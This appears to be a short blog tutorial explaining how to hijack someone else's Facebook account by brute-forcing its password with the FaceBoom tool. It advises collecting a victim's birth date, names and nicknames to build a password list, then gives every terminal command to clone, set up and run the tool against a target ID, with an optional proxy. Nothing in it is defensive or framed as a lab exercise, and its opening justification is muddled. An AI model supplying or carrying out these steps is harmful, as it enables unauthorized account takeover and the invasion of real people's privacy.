Facebook is one of the world’s leading social networks. At the same time, it is easy for hackers to break into Facebook accounts, because only Facebook can obtain complete information about the victim. Therefore, in this article, I will teach hackers how to use brute force to hack a Facebook account.
There are many ways to hack a Facebook account, but the unique feature of the brute force attack method is that it never touches the victim’s device.
However, the hacker needs to collect basic information about the victim, such as The victim’s date of birth, name, nickname, group name, etc. This information will help create a password file.
How to download and install the hack Facebook account Bruteforce tool?
Step 1:
First of all, we need to download the Bruteforce tool so type the below command on your terminal.
git clone https://github.com/Oseid/FaceBoom.git
Step 2:
Now change your directory to the FaceBoom folder so type this below command.
cd FaceBoom
Step 3:
Permit the faceboom.py python file to read, write, and execute.
chmod +x faceboom.py
Step 4:
After that run, the below command on your terminal to know the Bruteforce tool options.
python3 faceboom.py
Step 5:
Now you need to create a password file. If you don’t know, please read this article. After that, obtain the victim’s Facebook ID or username. Then hack target Facebook account without a proxy.
python3 faceboom.py -t (your target id) -w (your password file)
Hack Facebook with a proxy. type the following commands
python3 faceboom.py -t (your target id) -w (your password file) -p
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